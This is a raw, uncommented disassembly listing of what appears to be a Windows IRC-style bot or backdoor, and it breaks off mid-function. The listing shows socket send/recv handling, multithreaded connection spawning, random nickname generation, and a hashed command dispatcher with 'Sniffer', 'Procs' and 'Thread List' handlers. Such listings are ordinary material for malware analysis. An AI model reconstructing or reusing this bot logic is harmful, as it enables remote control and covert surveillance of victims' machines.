lea eax, [ebp+var_1008]
push offset aSSSSMail_gmail ; "%s %s\n%s %s \"mail.gmail.com\" \"127.0.0.1"...
push eax
call sub_422063
add esp, 2Ch
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_44D774[esi]
call dword_454350 ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
loc_4034E2: ; CODE XREF: sub_4033F0+193�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push dword_44D774[esi]
call dword_454330 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_403588
xor eax, eax
cmp [ebp+var_8], ebx
jmp short loc_40357E
; ---------------------------------------------------------------------------
loc_403516: ; CODE XREF: sub_4033F0+191�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_40353D
cmp al, 0Ah
jz short loc_40353D
cmp [ebp+arg_0], 0FA0h
jz short loc_40353D
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_403577
; ---------------------------------------------------------------------------
loc_40353D: ; CODE XREF: sub_4033F0+12F�j
; sub_4033F0+133�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_403577
push dword_44D774[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_4032F1
pop ecx
test eax, eax
pop ecx
ja short loc_403588
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_403577: ; CODE XREF: sub_4033F0+14B�j
; sub_4033F0+152�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
loc_40357E: ; CODE XREF: sub_4033F0+124�j
mov [ebp+var_4], eax
jnz short loc_403516
jmp loc_4034E2
; ---------------------------------------------------------------------------
loc_403588: ; CODE XREF: sub_4033F0+40�j
; sub_4033F0+11D�j ...
mov dword_44D770[esi], ebx
mov esi, dword_44D774[esi]
cmp esi, ebx
jbe short loc_40359F
push esi
call dword_4543AC ; closesocket
loc_40359F: ; CODE XREF: sub_4033F0+1A6�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4033F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A8 proc near ; CODE XREF: sub_403B2C+242A�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_403620
loc_4035BA: ; CODE XREF: sub_4035A8+76�j
xor edi, edi
mov eax, offset dword_44D770
loc_4035C1: ; CODE XREF: sub_4035A8+28�j
cmp [eax], ebx
jz short loc_4035D2
add eax, 210h
inc edi
cmp eax, offset dword_453E90
jl short loc_4035C1
loc_4035D2: ; CODE XREF: sub_4035A8+1B�j
cmp edi, 31h
jz short loc_403620
mov esi, edi
push [ebp+arg_0]
imul esi, 210h
lea eax, dword_44D77C[esi]
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_4]
mov dword_44D770[esi], 1
mov dword_44D97C[esi], eax
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset sub_4033F0
push ebx
push ebx
call dword_42F158 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4035BA
loc_403620: ; CODE XREF: sub_4035A8+10�j
; sub_4035A8+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4035A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403625 proc near ; CODE XREF: sub_4032F1+B4�p
; sub_4033F0+6F�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
call sub_4220FC
mov [ebp+var_4], eax
fild [ebp+var_4]
fmul dbl_42F300
call sub_4234BC
cmp eax, 1
jnz short loc_40367C
call sub_4220FC
call sub_4220FC
push 63h
cdq
pop ecx
idiv ecx
push off_4335A0[edx*4]
jmp short loc_403695
; ---------------------------------------------------------------------------
loc_40367C: ; CODE XREF: sub_403625+3C�j
call sub_4220FC
call sub_4220FC
cdq
mov ecx, 0D9h
idiv ecx
push off_433238[edx*4]
loc_403695: ; CODE XREF: sub_403625+55�j
lea eax, [ebp+var_2C]
push eax
call dword_42F04C ; lstrcpyA
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
push eax
call sub_422120
pop ecx
mov ebx, eax
push 13h
mov [ebp+var_4], ebx
pop eax
sub eax, ebx
mov dword ptr [ebp+var_18+4], eax
call sub_4220FC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_42F2F8
call sub_4234BC
mov esi, eax
call sub_4220FC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fimul [ebp+var_4]
fmul dbl_42F2F0
call sub_4234BC
cmp ebx, 2
mov edi, offset a_ ; "-|`_\\{[]}"
jle short loc_403707
cmp ebx, 3
jnz short loc_4036FE
cmp esi, 1
jz short loc_403707
loc_4036FE: ; CODE XREF: sub_403625+D2�j
cmp eax, 1
jnz loc_4037C0
loc_403707: ; CODE XREF: sub_403625+CD�j
; sub_403625+D7�j
call sub_4220FC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_42F2E8
call sub_4234BC
push off_4335A0[eax*4]
lea eax, [ebp+var_40]
push eax
call dword_42F04C ; lstrcpyA
lea esi, [ebp+ebx+var_2C]
movsx eax, byte ptr [esi-1]
push eax
push edi
call sub_4233B0
pop ecx
test eax, eax
pop ecx
jnz short loc_4037AD
movsx eax, [ebp+var_40]
push eax
push edi
call sub_4233B0
pop ecx
test eax, eax
pop ecx
jnz short loc_4037AD
call sub_4220FC
mov dword ptr [ebp+var_10+4], eax
dec ebx
fild dword ptr [ebp+var_10+4]
mov dword ptr [ebp+var_10+4], ebx
fild dword ptr [ebp+var_10+4]
fmulp st(1), st
fmul dbl_42F2F0
call sub_4234BC
cmp eax, 1
jnz short loc_4037AD
push edi
call sub_422120
and dword ptr [ebp+var_10+4], 0
mov dword ptr [ebp+var_10], eax
fild [ebp+var_10]
pop ecx
fstp qword ptr [ebp-8]
call sub_4220FC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul qword ptr [ebp-8]
fmul dbl_42F2F0
call sub_4234BC
mov al, byte ptr a_[eax] ; "-|`_\\{[]}"
mov [esi], al
loc_4037AD: ; CODE XREF: sub_403625+11C�j
; sub_403625+12D�j ...
push dword ptr [ebp+var_18+4]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_421F40
add esp, 0Ch
loc_4037C0: ; CODE XREF: sub_403625+DC�j
lea eax, [ebp+var_2C]
push eax
call sub_422120
mov esi, eax
mov [ebp+var_4], esi
movsx eax, [ebp+esi+var_2D]
push eax
call sub_423350
pop ecx
test eax, eax
pop ecx
jnz loc_403A17
movsx eax, [ebp+esi+var_2D]
push eax
push edi
xor ebx, ebx
call sub_4233B0
pop ecx
test eax, eax
pop ecx
jnz loc_403919
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_42F2F0
call sub_4234BC
cmp esi, 3
jz short loc_40382A
cmp eax, 1
jnz loc_403919
loc_40382A: ; CODE XREF: sub_403625+1FA�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_40386E
push edi
call sub_422120
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_42F2F0
call sub_4234BC
mov al, byte ptr a_[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_40388C
; ---------------------------------------------------------------------------
loc_40386E: ; CODE XREF: sub_403625+20E�j
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2E0
call sub_4234BC
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_40388C: ; CODE XREF: sub_403625+247�j
inc esi
xor ebx, ebx
mov [ebp+var_4], esi
inc ebx
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2D8
call sub_4234BC
cmp esi, 3
jz short loc_4038B2
cmp eax, ebx
jnz short loc_403919
loc_4038B2: ; CODE XREF: sub_403625+287�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_4038F7
push edi
call sub_422120
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_42F2F0
call sub_4234BC
mov al, byte ptr a_[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_403915
; ---------------------------------------------------------------------------
loc_4038F7: ; CODE XREF: sub_403625+297�j
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2E0
call sub_4234BC
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_403915: ; CODE XREF: sub_403625+2D0�j
inc esi
mov [ebp+var_4], esi
loc_403919: ; CODE XREF: sub_403625+1D0�j
; sub_403625+1FF�j ...
cmp esi, 6
jge short loc_403999
call sub_4220FC
cmp esi, 5
jge short loc_403936
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2F8
jmp short loc_40394F
; ---------------------------------------------------------------------------
loc_403936: ; CODE XREF: sub_403625+301�j
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_42F2F0
loc_40394F: ; CODE XREF: sub_403625+30F�j
call sub_4234BC
test eax, eax
jnz short loc_403972
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2D0
call sub_4234BC
mov cl, 30h
jmp short loc_40398F
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_403625+331�j
cmp eax, 1
jnz short loc_403999
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2E0
call sub_4234BC
mov cl, 41h
loc_40398F: ; CODE XREF: sub_403625+34B�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_403999: ; CODE XREF: sub_403625+2F7�j
; sub_403625+350�j
cmp ebx, 2
jge short loc_403A17
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul dbl_42F2F0
call sub_4234BC
cmp eax, 1
jnz short loc_403A17
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2D0
call sub_4234BC
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2C8
call sub_4234BC
cmp eax, 1
jnz short loc_403A17
cmp ebx, eax
jge short loc_403A17
call sub_4220FC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_42F2C0
call sub_4234BC
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_403A17: ; CODE XREF: sub_403625+1B8�j
; sub_403625+377�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_4222F0
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_403625 endp
; =============== S U B R O U T I N E =======================================
sub_403A30 proc near ; CODE XREF: sub_403B2C+3A9E�p
push esi
mov esi, offset dword_44D774
loc_403A36: ; CODE XREF: sub_403A30+2D�j
cmp dword ptr [esi-4], 1
jnz short loc_403A49
mov eax, [esi]
test eax, eax
jbe short loc_403A49
push eax
call dword_4543AC ; closesocket
loc_403A49: ; CODE XREF: sub_403A30+A�j
; sub_403A30+10�j
push dword ptr [esi]
call dword_42F298 ; closesocket
add esi, 210h
cmp esi, offset dword_453E94
jl short loc_403A36
xor eax, eax
pop esi
retn
sub_403A30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A63 proc near ; CODE XREF: sub_403B2C+7C2�p
; sub_419F6A+169�p
var_5B0 = byte ptr -5B0h
var_5AF = byte ptr -5AFh
var_1B0 = byte ptr -1B0h
var_158 = byte ptr -158h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 5B0h
push ebx
push esi
push edi
lea eax, [ebp+var_5B0]
push [ebp+arg_0]
push eax
call dword_42F04C ; lstrcpyA
cmp [ebp+var_5AF], 0
jz loc_403B24
mov al, [ebp+var_5B0]
cmp al, byte_439016
jnz loc_403B24
push 40h
lea eax, [ebp+var_100]
push [ebp+arg_0]
push eax
call sub_41EF08
mov ebx, eax
lea eax, [ebp+var_100]
push ebx
push eax
lea eax, [ebp+var_1B0]
push eax
call sub_4199D7
add esp, 18h
cmp [ebp+var_100], 0
mov esi, eax
lea edi, [ebp+var_158]
push 16h
pop ecx
rep movsd
jz short loc_403B24
mov eax, [ebp+var_100]
mov al, [eax]
cmp al, byte_439016
jnz short loc_403B24
push [ebp+arg_10]
inc [ebp+var_100]
lea eax, [ebp+var_5B0]
lea esi, [ebp+var_158]
sub esp, 58h
push 16h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push [ebp+arg_4]
push eax
lea eax, [ebp+var_100]
push ebx
push eax
call sub_403B2C
add esp, 70h
loc_403B24: ; CODE XREF: sub_403A63+23�j
; sub_403A63+35�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_403A63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B2C proc near ; CODE XREF: sub_403A63+B9�p
; sub_419B2F+10B�p
var_1BCAC = byte ptr -1BCACh
var_1ACAC = byte ptr -1ACACh
var_19CAC = byte ptr -19CACh
var_18CAC = byte ptr -18CACh
var_17CAC = byte ptr -17CACh
var_16CAC = byte ptr -16CACh
var_15CAC = byte ptr -15CACh
var_14CAC = byte ptr -14CACh
var_13CAC = byte ptr -13CACh
var_12CAC = byte ptr -12CACh
var_11CAC = byte ptr -11CACh
var_10CAC = byte ptr -10CACh
var_FCAC = byte ptr -0FCACh
var_ECAC = byte ptr -0ECACh
var_DCAC = byte ptr -0DCACh
var_CCAC = byte ptr -0CCACh
var_BCAC = byte ptr -0BCACh
var_ACAC = byte ptr -0ACACh
var_9CAC = byte ptr -9CACh
var_8CAC = byte ptr -8CACh
var_7CAC = byte ptr -7CACh
var_6CAC = byte ptr -6CACh
var_5CAC = byte ptr -5CACh
var_5B18 = byte ptr -5B18h
var_58DC = byte ptr -58DCh
var_54D8 = byte ptr -54D8h
var_529C = byte ptr -529Ch
var_5198 = byte ptr -5198h
var_5094 = dword ptr -5094h
var_5090 = byte ptr -5090h
var_4C90 = byte ptr -4C90h
var_4890 = byte ptr -4890h
var_4810 = dword ptr -4810h
var_480C = dword ptr -480Ch
var_4808 = dword ptr -4808h
var_4800 = dword ptr -4800h
var_47FC = dword ptr -47FCh
var_47F8 = dword ptr -47F8h
var_47F4 = dword ptr -47F4h
var_47F0 = dword ptr -47F0h
var_47EC = byte ptr -47ECh
var_46E8 = byte ptr -46E8h
var_45E8 = dword ptr -45E8h
var_45E4 = dword ptr -45E4h
var_44E4 = byte ptr -44E4h
var_43E4 = byte ptr -43E4h
var_42E0 = byte ptr -42E0h
var_41E0 = byte ptr -41E0h
var_40DC = byte ptr -40DCh
var_3FDC = byte ptr -3FDCh
var_3EDC = byte ptr -3EDCh
var_3DD8 = byte ptr -3DD8h
var_3CD8 = byte ptr -3CD8h
var_3C58 = dword ptr -3C58h
var_3C54 = byte ptr -3C54h
var_3BD4 = dword ptr -3BD4h
var_3B9C = dword ptr -3B9Ch
var_3A18 = dword ptr -3A18h
var_3A14 = byte ptr -3A14h
var_3994 = dword ptr -3994h
var_3984 = dword ptr -3984h
var_3980 = dword ptr -3980h
var_3968 = dword ptr -3968h
var_3964 = dword ptr -3964h
var_395C = dword ptr -395Ch
var_37D8 = byte ptr -37D8h
var_36D4 = dword ptr -36D4h
var_36D0 = byte ptr -36D0h
var_3650 = dword ptr -3650h
var_3640 = dword ptr -3640h
var_3624 = dword ptr -3624h
var_3620 = dword ptr -3620h
var_361C = dword ptr -361Ch
var_3618 = dword ptr -3618h
var_3494 = dword ptr -3494h
var_3490 = byte ptr -3490h
var_3410 = dword ptr -3410h
var_33F4 = dword ptr -33F4h
var_33E4 = dword ptr -33E4h
var_33E0 = dword ptr -33E0h
var_33D8 = dword ptr -33D8h
var_3254 = byte ptr -3254h
var_3150 = byte ptr -3150h
var_2150 = dword ptr -2150h
var_214C = byte ptr -214Ch
var_20CC = dword ptr -20CCh
var_20C8 = dword ptr -20C8h
var_20C4 = dword ptr -20C4h
var_20BC = dword ptr -20BCh
var_20B8 = dword ptr -20B8h
var_20B4 = dword ptr -20B4h
var_20A0 = dword ptr -20A0h
var_209C = dword ptr -209Ch
var_2098 = dword ptr -2098h
var_2094 = dword ptr -2094h
var_1F10 = dword ptr -1F10h
var_1F00 = dword ptr -1F00h
var_1E7C = dword ptr -1E7Ch
var_1E78 = dword ptr -1E78h
var_1DF4 = byte ptr -1DF4h
var_1D70 = dword ptr -1D70h
var_1D6C = dword ptr -1D6Ch
var_1D64 = dword ptr -1D64h
var_1D60 = byte ptr -1D60h
var_1CE0 = dword ptr -1CE0h
var_1CDC = dword ptr -1CDCh
var_1CD8 = dword ptr -1CD8h
var_1CD0 = dword ptr -1CD0h
var_1CCC = dword ptr -1CCCh
var_1CC8 = dword ptr -1CC8h
var_1CC4 = dword ptr -1CC4h
var_1CB4 = dword ptr -1CB4h
var_1CB0 = dword ptr -1CB0h
var_1CAC = dword ptr -1CACh
var_1CA8 = dword ptr -1CA8h
var_1B24 = dword ptr -1B24h
var_1B1C = byte ptr -1B1Ch
var_1A9C = byte ptr -1A9Ch
var_1A1C = byte ptr -1A1Ch
var_199C = dword ptr -199Ch
var_1998 = dword ptr -1998h
var_1994 = dword ptr -1994h
var_198C = dword ptr -198Ch
var_1988 = dword ptr -1988h
var_1984 = byte ptr -1984h
var_1904 = dword ptr -1904h
var_1900 = dword ptr -1900h
var_18D8 = dword ptr -18D8h
var_18D4 = dword ptr -18D4h
var_18D0 = dword ptr -18D0h
var_18CC = dword ptr -18CCh
var_1748 = byte ptr -1748h
var_1710 = byte ptr -1710h
var_16D8 = dword ptr -16D8h
var_16D4 = byte ptr -16D4h
var_15D4 = byte ptr -15D4h
var_1554 = dword ptr -1554h
var_1550 = dword ptr -1550h
var_154C = dword ptr -154Ch
var_1548 = dword ptr -1548h
var_1540 = dword ptr -1540h
var_153C = dword ptr -153Ch
var_1538 = dword ptr -1538h
var_1534 = dword ptr -1534h
var_1530 = dword ptr -1530h
var_152C = byte ptr -152Ch
var_1428 = byte ptr -1428h
var_13A8 = byte ptr -13A8h
var_1320 = dword ptr -1320h
var_131C = dword ptr -131Ch
var_1314 = byte ptr -1314h
var_1210 = dword ptr -1210h
var_1208 = byte ptr -1208h
var_1188 = byte ptr -1188h
var_1108 = byte ptr -1108h
var_1088 = dword ptr -1088h
var_1084 = dword ptr -1084h
var_1080 = dword ptr -1080h
var_107C = dword ptr -107Ch
var_1078 = dword ptr -1078h
var_1074 = dword ptr -1074h
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1060 = byte ptr -1060h
var_FE0 = byte ptr -0FE0h
var_F58 = dword ptr -0F58h
var_F54 = dword ptr -0F54h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F48 = dword ptr -0F48h
var_F44 = dword ptr -0F44h
var_F3C = dword ptr -0F3Ch
var_F38 = dword ptr -0F38h
var_F30 = byte ptr -0F30h
var_EB0 = byte ptr -0EB0h
var_E28 = dword ptr -0E28h
var_E24 = dword ptr -0E24h
var_E20 = dword ptr -0E20h
var_E1C = dword ptr -0E1Ch
var_E18 = dword ptr -0E18h
var_E14 = dword ptr -0E14h
var_E0C = dword ptr -0E0Ch
var_E08 = dword ptr -0E08h
var_E00 = byte ptr -0E00h
var_D80 = byte ptr -0D80h
var_CF8 = dword ptr -0CF8h
var_CF4 = dword ptr -0CF4h
var_CF0 = dword ptr -0CF0h
var_CEC = dword ptr -0CECh
var_CE8 = dword ptr -0CE8h
var_CE4 = dword ptr -0CE4h
var_CDC = dword ptr -0CDCh
var_CD8 = dword ptr -0CD8h
var_CD0 = byte ptr -0CD0h
var_C50 = byte ptr -0C50h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = dword ptr -0BC4h
var_BC0 = dword ptr -0BC0h
var_BBC = dword ptr -0BBCh
var_BB8 = dword ptr -0BB8h
var_BB4 = dword ptr -0BB4h
var_BAC = byte ptr -0BACh
var_B2C = byte ptr -0B2Ch
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = dword ptr -0A94h
var_A90 = dword ptr -0A90h
var_A8C = dword ptr -0A8Ch
var_A88 = dword ptr -0A88h
var_A84 = dword ptr -0A84h
var_A80 = byte ptr -0A80h
var_A00 = byte ptr -0A00h
var_980 = dword ptr -980h
var_97C = dword ptr -97Ch
var_978 = dword ptr -978h
var_974 = dword ptr -974h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_964 = dword ptr -964h
var_960 = dword ptr -960h
var_95C = byte ptr -95Ch
var_8DC = dword ptr -8DCh
var_8D8 = dword ptr -8D8h
var_8CC = dword ptr -8CCh
var_8C8 = dword ptr -8C8h
var_8AC = dword ptr -8ACh
var_8A8 = dword ptr -8A8h
var_8A4 = dword ptr -8A4h
var_720 = dword ptr -720h
var_71C = byte ptr -71Ch
var_69C = dword ptr -69Ch
var_698 = dword ptr -698h
var_694 = dword ptr -694h
var_68C = dword ptr -68Ch
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_670 = dword ptr -670h
var_66C = dword ptr -66Ch
var_668 = dword ptr -668h
var_664 = dword ptr -664h
var_4E0 = byte ptr -4E0h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_44C = dword ptr -44Ch
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_3B0 = dword ptr -3B0h
var_3AC = dword ptr -3ACh
var_3A8 = dword ptr -3A8h
var_3A4 = dword ptr -3A4h
var_3A0 = dword ptr -3A0h
var_39C = dword ptr -39Ch
var_398 = byte ptr -398h
var_318 = byte ptr -318h
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_274 = dword ptr -274h
var_270 = byte ptr -270h
var_238 = byte ptr -238h
var_228 = byte ptr -228h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_170 = dword ptr -170h
var_16C = word ptr -16Ch
var_16A = word ptr -16Ah
var_168 = dword ptr -168h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_144 = byte ptr -144h
var_134 = byte ptr -134h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = word ptr -70h
var_6E = dword ptr -6Eh
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = byte ptr 3Ch
arg_38 = dword ptr 40h
arg_50 = dword ptr 58h
arg_54 = dword ptr 5Ch
arg_58 = dword ptr 60h
arg_5C = dword ptr 64h
arg_60 = dword ptr 68h
arg_68 = dword ptr 70h
arg_6C = dword ptr 74h
push ebp
mov ebp, esp
mov eax, 1BCACh
call sub_4220C0
push ebx
mov ebx, dword_42F070
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
cmp [ebp+arg_6C], edi
jz short loc_403B6E
push dword ptr [esi]
push offset aC7rq4Xpvel_ ; "c7RQ4/xPvel."
call ebx ; dword_42F070
test eax, eax
jz loc_40AF54
push dword ptr [esi]
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
call ebx ; dword_42F070
test eax, eax
jz loc_40AF54
loc_403B6E: ; CODE XREF: sub_403B2C+1E�j
cmp [ebp+arg_24], edi
jz loc_403D83
push dword ptr [esi]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call ebx ; dword_42F070
test eax, eax
jnz short loc_403BB6
push offset aThreadList ; "Thread List"
push 5
loc_403B8B: ; CODE XREF: sub_403B2C+AF�j
; sub_403B2C+C5�j ...
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_C]
push edi
push [ebp+arg_20]
jnz short loc_403BA6
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
jmp loc_40A166
; ---------------------------------------------------------------------------
loc_403BA6: ; CODE XREF: sub_403B2C+69�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax]
jmp loc_40A166
; ---------------------------------------------------------------------------
loc_403BB6: ; CODE XREF: sub_403B2C+56�j
push dword ptr [esi]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_403BDD
push offset aSniffer ; "Sniffer"
push 0Eh
jmp short loc_403B8B
; ---------------------------------------------------------------------------
loc_403BDD: ; CODE XREF: sub_403B2C+A6�j
push dword ptr [esi]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call ebx ; dword_42F070
test eax, eax
jnz short loc_403BF3
push offset aProcs ; "Procs"
push 1
jmp short loc_403B8B
; ---------------------------------------------------------------------------
loc_403BF3: ; CODE XREF: sub_403B2C+BC�j
push dword ptr [esi]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call ebx ; dword_42F070
test eax, eax
jz loc_403D77
push dword ptr [esi]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call ebx ; dword_42F070
test eax, eax
jz loc_403D77
push dword ptr [esi]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_403C44
push [ebp+arg_20]
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_C]
push [ebp+arg_14]
push [ebp+arg_10]
jnz short loc_403C38
